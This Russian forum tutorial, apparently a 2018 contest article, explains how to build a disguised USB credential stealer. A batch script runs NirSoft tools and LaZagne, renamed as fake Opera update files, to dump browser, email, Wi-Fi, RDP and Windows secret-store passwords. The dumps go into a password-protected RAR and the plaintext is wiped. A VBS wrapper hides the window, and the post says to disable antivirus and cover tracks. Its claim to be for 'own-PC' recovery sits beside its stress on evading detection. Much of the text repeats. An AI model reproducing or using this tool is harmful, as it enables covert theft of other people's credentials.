"Статья для участия в конкурсе Конкурс 2018 года - авторская статья по любой тематике нашего форума! "
Всем привет! Мои поздравления с ННГ!
Публикую новогодний Tutorial - релевантный hack_man в жанре киберпанк по созданиюпрокачанного стиллера «гибридной системы сбора данных». Агрессивный/надежный/проверенный годами и простой с технической точки зрения «комбайн восстановления учёток/секретных данных».
Стиллер говорите? Predator the thief? Сборщик паролей «Pony»? Fastir_Collector? Да, аналогичного ПО (особенно для ОС семейства Windows) существует немало вариаций. Но некоторые подобного рода проги (IMHO) обладают и недостатками: компромат; отсутствие шифрования (да, есть и такие); shareware; заброшенный проект; баги; GUI, а нужен тихий режим; или попросту морально устаревший софт. Но хуже всего обстоят дела, если в crafty software имеются бэкдоры.
Подобное ПО описанное выше, конечно же имеет право быть в арсенале у каждого Амиго... (вопрос веры/умения и здесь он не рассматривается).
Звучит вроде бы пафосно, но я подписываюсь под каждым словом в статье (это моё субъективное мнение) и собираюсь подкрепить «Уровень» заявленными подробностями ниже.
В статье продемонстрирую принцип работы софт-форка по восстановлению забытых «паролей» (логины/пароли/перс.данные) со своего ПК. Ключевое слово «СВОЕГО», как только флешка используется на чужой машине, в дверь могут постучаться очень настойчивые ребята с мешком, но отнюдь не Дед мороз со своей Снегурочкой.
Предполагаю, что статья зайдёт коллекционерам стиллеров, однако стоит напомнить в очередной раз, что свобода дороже!
Пожалуйста помните об ответственности, которая распространяется на обладателя/действия подобного рода программ! Как только оступитесь и подумаете «о чём-то таком» из шкафа тут же выпрыгнут...
Статья написана в ознакомительных целях, автор не несёт никакой ответственности за ваши помыслы и действия.
Преимущества, которыми обладает «собранный форк», некоторые демонстрируется на видео.
┌──Жатва урожая. Что умеет собирать, наш будучи-собранный комбайн:
├──╼ Логины/пароли учёток из последних версий браузеров: Opera; Firefox; M.Edge/IE; Chrome (в том числе, сбор паролей из браузера Firefox за защитой мастер-паролем - жалкая преграда).
├──╼ Учетки из некоторых клиентов: FTP; Filezilla; Яндекс диск (Webdav проводника); vpn-соединений, OpenSSH, Putty, RDP.
├──╼ Пароли секретных хранилищ LSA; LM/NT; сисадминский пароль; пароль домашней сети (pass - домашней группы); пароли сохранённых wifi-соединений/точек.
├──╼ Учетки почтовых клиентов Outlook; Thunderbird.
├──╼ Product ID/KEY: ключи ОС Windows; MS Office; Visual Studio; SQL Server.
├──╼ Веб-историю «Всех» браузеров (ссылка и ее длина, время визита на сайт, название посещенного ресурса, браузер и его версия).
├──╼ Локальную историю действий пользователей за все время существования Windows на ПК по дате и времени (открытие папок/файлов; выход_в_сеть; вкл-выкл-ребут-сон-продолжительность_работы_ПК; Install-uninstall_Software).
├──╼ Дамп и анализ планировщика заданий.
├──╼ Сбор имен инсталлированного ПО и расширенный его анализ.
├──╼ Некоторые учетки непопулярных мессенджеров.
└──╼ Удобочитаемые отчеты.
am29f010b, и при поддержке авторов статей конкурс от codeby.net пикчерз представляют: тихий блокбастер
Идея: объединить разные (freeware) сборщики учетных данных; зашифровать тело/стандартный вывод потока данных, и автоматизировать процесс работы форка и его логирования; «замести следы».
Инструменты, которые понадобятся в ходе создания пака
Пройдемся по пунктам: «какая закуска; сколько спиртного; какое вино»
ПК с ОС Windows 7/10 (32/64).
На время «возвращения Малыша Нельсона» отключаем проактивную защиту.
Архиватор
Необходим 32 разрядной версии архиватор RAR, чтобы гарантированно работал на всех наших ПК. RAR – отличается своей криптостойкостью хеша к типам атак брутфорса/радужных таблиц (дайте мне знать, если вам нужен более развёрнутый ответ «на сколько всё устойчиво»).
Скачиваем пробную RU-версию архиватора с
Готово! Теперь у нас на флэшке портативная версия Архиватора winrar.
Софт Winrar поставляется под коммерческой лицензией, но по истечению пробного периода, архиватор продолжит работать на законных основаниях и дальше. Неудобство будет заключаться, во всплывающем окне с просьбой "приобрести активацию, если в этом есть такая необходимость"
Nirsoft
Любопытная тема: нам понадобятся хакерские инструменты с поддержкой командной строки от Кудесника. Вот только давление безов вынудило его на активные действия: на рокировку в длинную сторону. Разработчик выпилил функционал командной строки, из нужных нам прог, но уничтожить свое полноценное творение не смог. По
Шаги, как заиметь сборник софта от Nirsoft с поддержкой командной строки (примечание - ниже цитата от автора):
Но! Это только 1/3 софта с поддержкой cmd, который нам потребуется!
Забираем наши аддоны с сайта Nirsoft (32 разрядные версии программ, чтобы гарантированно работали и на нашей устаревшей тачке):
Однако всё же, о таком славном дополнении к cmd, как encryptedregview, который сканирует реестр и расшифровывает защищенным DPAPI секретные данные (пароли/лицензии коммерческого софта на ПК) – можно позабыть. Это теперь оконная прога, которая запускается отдельно от комбайна – если в ней есть такая необходимость.
LaZagne
Этот софт тащит учетные данные, что и софт Кудесника + разнообразие свыше. ПО друг друга взаимозаменяет и дополняет, ну прямо как «ГЛОНАСС и GPS» на наших гаджетах.
Первый лежачий полицейский: в
Все необходимые инструменты собрали, проактивную защиту приглушили. В бой!
Приступаем к сборке "своего комбайна"
На флешке у нас уже создан каталог ~\Opera\Opera\Opera, в него инсталлирован архиватор winrar ~\Opera\Opera\Opera\winrar.
Пояснение по скрипту (разбор каждой строчки/флага).
#Изменение метки флэшки или буквы диска никак не повлияет на работу нашего форка, все сработает по-новогоднему - волшебно! (при работе проги на другой машине буква диска иногда меняется – no problem).
награбленные собранные учетные данные (продублирует тело ПО в стандартный поток вывода «vremenno» (на случай, если кто-то без разрешения сотрет форк с флэшки);
+ надёжно зашифрует все секреты (в том числе имена файлов);
+ поместит архив с уникальным именем в папку winrar на нашей флэшке;
+ уничтожит и затрёт захваченные в открытом виде данные (отработанные данные в открытом виде ПО Nirsoft-а и LaZagne в каталоге «vremenno»).
Используемые ключи rar:
a -m0 # режим архивирования без сжатия;
-hpCodeby # зашифровать данные и имена файлов паролем по умолчанию “Codeby”;
-dw # уничтожить/затереть файлы после архивации (удалить данные без возможности их восстановления);
-ag # к имени архива с данными добавляется суффикс/окончание «дата и время» (благодаря этому флагу архивы не будут друг друга перезаписывать при каждом новом сборе данных, визуально легко определить какой архив от какой машины);
-r # рекурсивное архивирование (без комментариев);
-ep # исключить пути из имен (данный архив не мусорка);
-idq # тихий режим rar (запрет вербализации в cmd);
help.rar # «корень/приставка» имени создаваемого архива с данными;
\Opera\Opera\Opera\vremenno # цель, сообщить архиватору с каким каталогом работать (шифрование/уничтожение данных).
Второй лежачий полицейский: данный скрипт предназначен для работы на ОС Windows, если «нечаянно» запустить форк на GNU/Linux, или прерватьугодить в цейтнот, прервав рабочую сессию - gun down в Windows, то каталог «vremenno» не удалится с флэшки. Можно подзабыть почистить за собой вручную (или «неправильно» удалить папку), и тогда кому-то, кому любопытно crafty software, может на глаза попасться интересное: «-hpCodeby». Можно защититься от такого поведения и изменить строку в скрипте:
на
После создания скрипта C:/Codeby/Bobi_teri.bat, собираем обертку.
1) Архивируем все файлы (Opera[XY].exe и Bobi_teri.bat) в самораспаковывающийся архив Opera58.exe.
2) Скачиваем наш форк на флэшку в каталог ~\Opera\Opera\Opera\Opera58.exe.
Если требуется Тихий режим работы форка (скрыть полностью командную строку во время работы софта), тогда открываем блокнот наполняем его текстом
Сохраняем его в C:\Codeby\Bobi_teri.vbs
И архивируем всё, как описано выше, см. скрин «». Но только «Выполнить после распаковки» заменяем Bobi_teri.bat на Bobi_teri.vbs (Bobi_teri.bat и Bobi_teri.vbs должны быть в одном архиве).
Софт по захвату персональных и секретных данных полностью готов, что за crufty software такой «Opera58.exe» никто не может знать (имена фанфар так же зашифрованы), короче говоря, форк и его дамп [exe] монолитные и имеют слабую корреляцию.
Скрин. Анализ данных после ввода пароля к зашифрованному дампу с уязвимой машины.
Выводы
Сама идея реализации форка классическая и проверенная временем, основана на трёх китах:
И так, «любой Амиго» сможет создавать подобные «стиллеры» в корыстных целях, а не только для восстановления забытых паролей – плохо и не всегда наказуемо, а у хакера подобные игрушки с «пелёнок». Как защитится от подобных проделок злоумышленника при его физическом доступе к ПК? Ответ прост, для этого и существует защита от «paradise cracked», и к примеру, мое
p/s/ Пожалуйста не называйте, описанную выше тулзу (хотя я и обозвал её пару раз в статье «грабителем и пр.»),
- это принципиально другой пак! Более солянистый и более легальный.
p/p/s/ С помощью, описанного в этой статье ПО, когда-то на одной из своих машин (сборка Windows 8 какая-то была) был обнаружен предустановленный и замаскированный (СИ) пароль в хранилище Windows для удаленного подключения к ПК (конечно это не работало, наверное - как задумывалось, но наличие самого факта...)
p/p/p/s/ Почему в статье я называю "Nirsoft" Магом и волшебником?
p/p/p/p/s/ А еще если сделать зум в браузере на форуме Кодебай, то круглые иконки пользователей становятся
На этом я с вами прощаюсь, чудесных выходных!
[
Ссылка скрыта от гостей
.]
Всем привет! Мои поздравления с ННГ!
Публикую новогодний Tutorial - релевантный hack_man в жанре киберпанк по созданию
Стиллер говорите? Predator the thief? Сборщик паролей «Pony»? Fastir_Collector? Да, аналогичного ПО (особенно для ОС семейства Windows) существует немало вариаций.
Подобное ПО описанное выше, конечно же имеет право быть в арсенале у каждого Амиго... (вопрос веры/умения и здесь он не рассматривается).
Звучит вроде бы пафосно, но я подписываюсь под каждым словом в статье (это моё субъективное мнение) и собираюсь подкрепить «Уровень» заявленными подробностями ниже.
В статье продемонстрирую принцип работы софт-форка по восстановлению забытых «паролей» (логины/пароли/перс.данные) со своего ПК. Ключевое слово «СВОЕГО», как только флешка используется на чужой машине, в дверь могут постучаться очень настойчивые ребята с мешком, но отнюдь не Дед мороз со своей Снегурочкой.
Предполагаю, что статья зайдёт коллекционерам стиллеров, однако стоит напомнить в очередной раз, что свобода дороже!
Пожалуйста помните об ответственности, которая распространяется на обладателя/действия подобного рода программ! Как только оступитесь и подумаете «о чём-то таком» из шкафа тут же выпрыгнут...
Статья написана в ознакомительных целях, автор не несёт никакой ответственности за ваши помыслы и действия.
Преимущества, которыми обладает «собранный форк», некоторые демонстрируется на видео.
- Автономность. Отсутствие каких-либо зависимостей/действий. Все что необходимо сделать, чтобы собирать/напоминать нам горсти НАШИХ секретов - вставить флэшку в машину с ОС Windows, запустить exe-шник, ввести мастер-пароль и ждать праздника. Всё.
- Тихий режим. На видео специально показана работа командной строки (и жирные дядьки с пивом), которую легко скрыть (ниже я покажу как), но невозможно скрыть вульгарные действия скрытых процессов, порожденные «бурей», например в
Ссылка скрыта от гостей.
- Поддержка ОС Windows XP/10.
- Правдоподобное отрицание наличие самого ПО (криптостойкое шифрование самого форка и собранных данных, ПО не подлежит декомпиляции).
- В пассивном режиме «никогда» не будет детектироваться ни одним антивирусом.
- Отсутствие следов деятельности на HDD/USB (по окончанию сбора данных, не остается никаких следов на жестком/флэш диске или в журналах ОС, и нет возможности восстановления каких-либо конфиденциальных/компрометирующих материалов). Можно «потерять» флэш-накопитель, не опасаясь за тех, кто его найдет, за собранную информацию и за свою за…цу.
- Внушающий захват данных – не иначе, как Малыш Нельсон вернулся со своим дыроделом, для того чтобы ограбить и выбить дух из ПК с ОС Windows. Этичнее это звучит примерно так – максимальный сбор конфиденциальной информации со своей машины.
- КПД ↑ и простота реализации идеи (я не шучу. Чем сложнее софт, тем сложнее система и тем труднее обеспечить её надёжность - это элементарная математическая теория вероятности). Реализовать задумку сможет «любой Амиго» без особых технических навыков, но у которого пригорает из-за СВОИХ забытых паролей/секретов на СВОЕМ ПК.
- Схема, проверенная временем.
- Основной код (тело софта) основано на либеральных лицензиях, обертка – shareware (по факту на законных основаниях - обертка freeware).
- время работы софта в районе 1 минуты;
- временное присутствие следов сбора данных в ОЗУ ([VBS] FreeMem=Space(X) – вариант ненадёжный);
- в активной фазе жатвы урожая, необходимо отключать проактивную защиту на ПК;
- нет возможности выудить пароли из Яндекс-браузера (такая возможность периодически появляется, но в скором времени исчезает), но всё же «кое-что» из ЯБ - ловится «всегда»; аналогично и со Скайпом.
- сбор логов не отправляется на какой-либо веб сервер.
- физический доступ к ПК с привилегиями администратора.
┌──Жатва урожая. Что умеет собирать, наш будучи-собранный комбайн:
├──╼ Логины/пароли учёток из последних версий браузеров: Opera; Firefox; M.Edge/IE; Chrome (в том числе, сбор паролей из браузера Firefox за защитой мастер-паролем - жалкая преграда).
├──╼ Учетки из некоторых клиентов: FTP; Filezilla; Яндекс диск (Webdav проводника); vpn-соединений, OpenSSH, Putty, RDP.
├──╼ Пароли секретных хранилищ LSA; LM/NT; сисадминский пароль; пароль домашней сети (pass - домашней группы); пароли сохранённых wifi-соединений/точек.
├──╼ Учетки почтовых клиентов Outlook; Thunderbird.
├──╼ Product ID/KEY: ключи ОС Windows; MS Office; Visual Studio; SQL Server.
├──╼ Веб-историю «Всех» браузеров (ссылка и ее длина, время визита на сайт, название посещенного ресурса, браузер и его версия).
├──╼ Локальную историю действий пользователей за все время существования Windows на ПК по дате и времени (открытие папок/файлов; выход_в_сеть; вкл-выкл-ребут-сон-продолжительность_работы_ПК; Install-uninstall_Software).
├──╼ Дамп и анализ планировщика заданий.
├──╼ Сбор имен инсталлированного ПО и расширенный его анализ.
├──╼ Некоторые учетки непопулярных мессенджеров.
└──╼ Удобочитаемые отчеты.
am29f010b, и при поддержке авторов статей конкурс от codeby.net пикчерз представляют: тихий блокбастер
Идея: объединить разные (freeware) сборщики учетных данных; зашифровать тело/стандартный вывод потока данных, и автоматизировать процесс работы форка и его логирования; «замести следы».
Инструменты, которые понадобятся в ходе создания пака
- ПК с ОС Windows.
- Архиватор RAR портативная версия.
- Софт Кудесника – Nirsoft.
- Софт LaZagne и его патч.
Пройдемся по пунктам: «какая закуска; сколько спиртного; какое вино»
ПК с ОС Windows 7/10 (32/64).
На время «возвращения Малыша Нельсона» отключаем проактивную защиту.
Архиватор
Необходим 32 разрядной версии архиватор RAR, чтобы гарантированно работал на всех наших ПК. RAR – отличается своей криптостойкостью хеша к типам атак брутфорса/радужных таблиц (дайте мне знать, если вам нужен более развёрнутый ответ «на сколько всё устойчиво»).
Скачиваем пробную RU-версию архиватора с
Ссылка скрыта от гостей
.- Создаём на флэшке каталог ~\Opera\Opera\Opera.
- Инсталлируем RAR на флэшку в ~\Opera\Opera\Opera\winrar.
- Создаем в каталоге файл ~\Opera\Opera\Opera\winrar\winrar.ini
- С помощью блокнота наполняем winrar.ini
Код:
Global\AppData=0
Global\Integration=0
Global\SaveSettings=0Готово! Теперь у нас на флэшке портативная версия Архиватора winrar.
Софт Winrar поставляется под коммерческой лицензией, но по истечению пробного периода, архиватор продолжит работать на законных основаниях и дальше. Неудобство будет заключаться, во всплывающем окне с просьбой "приобрести активацию, если в этом есть такая необходимость"
- Активацию архиватора вы можете приобрести за 29$ (я почти уверен, что это не требуется большинству порядочным юзерам).
- Не приобретать лицензию (просто закрывать всплывающее окно о приобретении лицензии при работе с winrar).
- Или короче, многие сами знают, где лицензию «взять» – это файл активации «rarreg.key».
Nirsoft
Любопытная тема: нам понадобятся хакерские инструменты с поддержкой командной строки от Кудесника. Вот только давление безов вынудило его на активные действия: на рокировку в длинную сторону. Разработчик выпилил функционал командной строки, из нужных нам прог, но уничтожить свое полноценное творение не смог. По
Ссылка скрыта от гостей
Волшебник сам нашел выход из «тупика» и для себя и для нас, короче, ушел в три нуля и выложил в сети нужный нам софт «отдельно» от своего сайта, сохранив свои авторские права и почтение перед серыми шляпами. Инструкция, где взять необходимые инструменты для выполнения поставленной задачи -
Ссылка скрыта от гостей
.Шаги, как заиметь сборник софта от Nirsoft с поддержкой командной строки (примечание - ниже цитата от автора):
Но! Это только 1/3 софта с поддержкой cmd, который нам потребуется!
Забираем наши аддоны с сайта Nirsoft (32 разрядные версии программ, чтобы гарантированно работали и на нашей устаревшей тачке):
-
Ссылка скрыта от гостей;
- расширенную
Ссылка скрыта от гостей;
- прогу для
Ссылка скрыта от гостей;
- прогу для
Ссылка скрыта от гостей;
- локальный
Ссылка скрыта от гостей;
- мини-локалный
Ссылка скрыта от гостей;
- анализатор
Ссылка скрыта от гостей;
- анализатор
Ссылка скрыта от гостей;
- и
Ссылка скрыта от гостей.
Однако всё же, о таком славном дополнении к cmd, как encryptedregview, который сканирует реестр и расшифровывает защищенным DPAPI секретные данные (пароли/лицензии коммерческого софта на ПК) – можно позабыть. Это теперь оконная прога, которая запускается отдельно от комбайна – если в ней есть такая необходимость.
LaZagne
Этот софт тащит учетные данные, что и софт Кудесника + разнообразие свыше. ПО друг друга взаимозаменяет и дополняет, ну прямо как «ГЛОНАСС и GPS» на наших гаджетах.
Первый лежачий полицейский: в
Ссылка скрыта от гостей
последней v2.4 – критическая ошибка, не позволяющая отрабатывать скрипты на python-е, как минимум на Windows 10 Home. Модули, расширяющий функционал LaZagne, разрабатывают все, кто «в теме», а курирует проект один человек, который иногда ошибается. В LaZagne последней версии разработчик допустил ошибку. Поэтому
Ссылка скрыта от гостей
исправление LaZagne с главной ветки проекта на
Ссылка скрыта от гостей
-е, где исправлена ошибка. Разработчик в курсе этой ошибки, но медлит с фиксами (пытается разобраться в Python3).Все необходимые инструменты собрали, проактивную защиту приглушили. В бой!
Приступаем к сборке "своего комбайна"
На флешке у нас уже создан каталог ~\Opera\Opera\Opera, в него инсталлирован архиватор winrar ~\Opera\Opera\Opera\winrar.
- Объединяем все файлы: exe-шники (Nirsoft + LaZagne) в любом временном каталоге на HDD, например, «С:\Codeby».
- Переименовываем все файлы по маске «цифра» (операцию: «групповое переименование файлов», например, легко проделать в Total Commander). Было ChromePass.exe стало UpdateOpera_patch1320.exe; LaZagne.exe - OperaStars.exe и тд. Эти действия «необходимы», как элемент из притчи о социальной инженерии и для простоты наглядности визуализации кода.
- Пишем скрипт «Bobi_teri.bat»
Код:
@echo OFF
start UpdateOpera_patch1320.exe /stext 20.txt
start UpdateOpera_patch1321.exe /stext 21.txt
start UpdateOpera_patch1322.exe /stext 22.txt
start UpdateOpera_patch1323.exe /stext 23.txt
start UpdateOpera_patch1324.exe /stext 24.txt
start UpdateOpera_patch1325.exe /stext 25.txt
start UpdateOpera_patch1326.exe /stext 26.txt
start UpdateOpera_patch1327.exe /stext 27.txt
start UpdateOpera_patch1328.exe /stext 28.txt
start UpdateOpera_patch1329.exe /stext 29.txt
start UpdateOpera_patch1330.exe /stext 30.txt
start UpdateOpera_patch1331.exe /stext 31.txt
start UpdateOpera_patch1332.exe /stext 32.txt
start UpdateOpera_patch1333.exe /stext 33.txt
start UpdateOpera_patch1334.exe /stext 34.txt
start UpdateOpera_patch1335.exe /stext 35.txt
start UpdateOpera_patch1336.exe /stext 36.txt
start UpdateOpera_patch1337.exe /stext 37.txt
start UpdateOpera_patch1338.exe /stext 38.txt
start UpdateOpera_patch1339.exe /stext 39.txt
OperaStars.exe all > \Opera\Opera\Opera\vremenno\Stars.txt
cd \Opera\Opera\Opera\winrar
rar a -m0 -hpCodeby -dw -ag -r -ep -idq help.rar \Opera\Opera\Opera\vremenno
exitПояснение по скрипту (разбор каждой строчки/флага).
#Изменение метки флэшки или буквы диска никак не повлияет на работу нашего форка, все сработает по-новогоднему - волшебно! (при работе проги на другой машине буква диска иногда меняется – no problem).
- @echo OFF # отключить вербализацию во время работы скрипта в cmd.
- start UpdateOpera_patch[Х].exe /stext [Y].txt # поочередное исполнение всех инструментов Кудесника (захват и анализ данных), сохранение логов в файлы.txt [20..39/Stars]. Для удобства, чтобы пользователь не запутался, код в статье приведен, как
start UpdateOpera_patch1337.exe /stext 37.txt. При персональной сборке форка записывайте код [латиницей], какstart UpdateOpera_patch1337.exe /stext Password_in-Browser.txt # и тп. - OperaStars.exe all > \Opera\Opera\Opera\vremenno\Stars.txt # отработать все написанные на python-е скрипты LaZagne (скомпилированные в OperaStars.exe), и записать стандартный вывод награбленных и расшифрованных данных на флэшку в ~\Opera\Opera\Opera\vremenno\Stars.txt.
- cd \Opera\Opera\Opera\winrar # переход в каталог winrar, так как нам нужно будет шифровать/уничтожать полученные данные. Обратите внимание на прямые и обратные слэши в скрипте – это не ошибка.
- rar a -m0 -hpCodeby -dw -ag -r -ep -idq help.rar \Opera\Opera\Opera\vremenno # так как «мы находимся в каталоге программы архиватора winrar, то нам стала доступна cmd rar. Данная строка по скрипту завершает код, что даёт:
+ надёжно зашифрует все секреты (в том числе имена файлов);
+ поместит архив с уникальным именем в папку winrar на нашей флэшке;
+ уничтожит и затрёт захваченные в открытом виде данные (отработанные данные в открытом виде ПО Nirsoft-а и LaZagne в каталоге «vremenno»).
Используемые ключи rar:
a -m0 # режим архивирования без сжатия;
-hpCodeby # зашифровать данные и имена файлов паролем по умолчанию “Codeby”;
-dw # уничтожить/затереть файлы после архивации (удалить данные без возможности их восстановления);
-ag # к имени архива с данными добавляется суффикс/окончание «дата и время» (благодаря этому флагу архивы не будут друг друга перезаписывать при каждом новом сборе данных, визуально легко определить какой архив от какой машины);
-r # рекурсивное архивирование (без комментариев);
-ep # исключить пути из имен (данный архив не мусорка);
-idq # тихий режим rar (запрет вербализации в cmd);
help.rar # «корень/приставка» имени создаваемого архива с данными;
\Opera\Opera\Opera\vremenno # цель, сообщить архиватору с каким каталогом работать (шифрование/уничтожение данных).
Второй лежачий полицейский: данный скрипт предназначен для работы на ОС Windows, если «нечаянно» запустить форк на GNU/Linux, или прерватьугодить в цейтнот, прервав рабочую сессию - gun down в Windows, то каталог «vremenno» не удалится с флэшки. Можно подзабыть почистить за собой вручную (или «неправильно» удалить папку), и тогда кому-то, кому любопытно crafty software, может на глаза попасться интересное: «-hpCodeby». Можно защититься от такого поведения и изменить строку в скрипте:
rar a -m0 -hpCodeby -dw -ag -r -ep -idq help.rar \Opera\Opera\Opera\vremennoна
rar a -m0 -p -dw -ag -r -ep -idq help.rar \Opera\Opera\Opera\vremenno # в таком случае, при работе форка на ОС Windows нужно будет вводить два различных пароля: один пароль - мастер пароль, другой пароль (по окончанию работы форка всплывет окно) - «любой pass» для открытия будучи-созданного архива help[ХY].rar. Минусы и плюсы такого решения становятся очевидными на практике.После создания скрипта C:/Codeby/Bobi_teri.bat, собираем обертку.
1) Архивируем все файлы (Opera[XY].exe и Bobi_teri.bat) в самораспаковывающийся архив Opera58.exe.
2) Скачиваем наш форк на флэшку в каталог ~\Opera\Opera\Opera\Opera58.exe.
Если требуется Тихий режим работы форка (скрыть полностью командную строку во время работы софта), тогда открываем блокнот наполняем его текстом
Код:
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run("Bobi_teri.bat"), 0, TrueИ архивируем всё, как описано выше, см. скрин «». Но только «Выполнить после распаковки» заменяем Bobi_teri.bat на Bobi_teri.vbs (Bobi_teri.bat и Bobi_teri.vbs должны быть в одном архиве).
Софт по захвату персональных и секретных данных полностью готов, что за crufty software такой «Opera58.exe» никто не может знать (имена фанфар так же зашифрованы), короче говоря, форк и его дамп [exe] монолитные и имеют слабую корреляцию.
Скрин. Анализ данных после ввода пароля к зашифрованному дампу с уязвимой машины.
Выводы
Сама идея реализации форка классическая и проверенная временем, основана на трёх китах:
- Объединить лучший софт.
- Зашифровать тело и дамп «сборщика секретных данных»
- «Замести следы».
И так, «любой Амиго» сможет создавать подобные «
Ссылка скрыта от гостей
по нему, но это уже другая история - криптографии. И да, не слушайте тех, кто яростно доказывает никчемность полнодискового шифрования... Им ни история Сноудена, ни пример…, ни шпионаж, ни чего другое не аргумент.p/s/ Пожалуйста не называйте, описанную выше тулзу (хотя я и обозвал её пару раз в статье «грабителем и пр.»),
p/p/s/ С помощью, описанного в этой статье ПО, когда-то на одной из своих машин (сборка Windows 8 какая-то была) был обнаружен предустановленный и замаскированный (СИ) пароль в хранилище Windows для удаленного подключения к ПК (конечно это не работало, наверное - как задумывалось, но наличие самого факта...)
p/p/p/s/ Почему в статье я называю "Nirsoft" Магом и волшебником?
Потому что пользуюсь Nirsoft-ом, когда еще в сети Mr.Robot-а не крутили, и знаю о надежности софта (международный и мой вопрос веры
).
Nir Sofer (в одиночку создавал портативные free-утилиты) посвятил себя цифре. Вот его созданный и признанный на мировом (у хакеров так же в почёте) уровне софт, который умеет "Брутить/Парсить/Снифить/Дампить..."
).Nir Sofer (в одиночку создавал портативные free-утилиты) посвятил себя цифре. Вот его созданный и признанный на мировом (у хакеров так же в почёте) уровне софт, который умеет "Брутить/Парсить/Снифить/Дампить..."
p/p/p/p/s/ А еще если сделать зум в браузере на форуме Кодебай, то круглые иконки пользователей становятся
На этом я с вами прощаюсь, чудесных выходных!
